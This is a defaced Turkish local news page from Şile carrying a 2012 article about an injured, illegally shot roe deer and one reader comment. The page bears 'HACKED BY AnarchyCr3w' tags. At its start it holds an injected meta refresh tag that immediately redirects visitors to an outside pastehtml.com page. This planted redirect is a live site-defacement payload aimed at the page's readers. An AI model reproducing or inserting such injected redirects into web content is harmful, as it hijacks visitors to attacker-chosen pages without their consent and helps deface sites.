"> " /> HACKED BY AnarchyCr3w<m<x>eta http-equiv="refresh" content="0;URL=http://pastehtml.com/view/dljd5ohu3.html"> - KARACA NEDEN VURULUR?
Meral Akşener’e Müthiş İlgi
HDP “Şile’de Bizde Varız” Dedi
MHP Milletvekili Başeskioğlu’na Şile’de Sevgi Yumağı
Karakter boyutu :13 Punto15 Punto17 Punto19 Punto

KARACA NEDEN VURULUR?

KARACA NEDEN VURULUR?
24.10.2012 / 13:22


Kızılcaköylü bazı vatandaşlar 19 Ekim günü yol kenarında acımasız ellerce vurulmuş yaralı bir Karaca buldular. Olay yerine çağrılan Şile Jandarma ekiplerince araca yüklenen karaca İlçe Jandarma Komutanlığına götürüldü. Yapılan  ilk tetkiklerde kafası ve kulaklarında kurumuş saçma izleri tespit edilen genç Karacanın  sol gözünün çıktığı, sağ gözünün  ise enfeksiyon kaptığı belirlendi. İstanbul’dan gelen yetkili Milli Parklar Orman Muhafaza Memurlarına teslim edilen hayvan

kurum tarafından yapılacak tedavinin ardından Şile ormanlarında tekrar özgürce dolaşmaya devam edecek. 

Karaca devlet tarafından avlanması yasak olan hayvanlar listesinde yer alırken, cezası ise 6500tl.ye kadar varabiliyor.  


Etiketler:
Bu haber toplam 289 defa okundu
YORUMLAR
şileli: 
"ÖLDÜRMEYİ SPOR OLARAK TANIMLAYANLAR SEBEBİYLE"
İnsana zarar veren hayvan bile olmadıkları halde,Türleri yok olmak üzere olduğu halde,güzellikleri insanları büyüleyen bu karacaları ancak iki ayaklı, akılsız, insan görünümlü, bu yaptığı işi de spor olarak görüp kahvede anlatan hayvanlar vurabilir. Bu hayvanları yakalamak çok zor değil, bu hayvan karacaya silah attığını çevresine söylemiştir. sıkı bir takip olayı çözecektir. Yoksa bu insan görünümlü hayvan diğer karacaları da katleder. Jandarma bu olayı çözecek yeteneğe sahiptir. Çözmelidir.
25.10.2012 / 14:36
YAZARLAR
HACKED BY AnarchyCr3w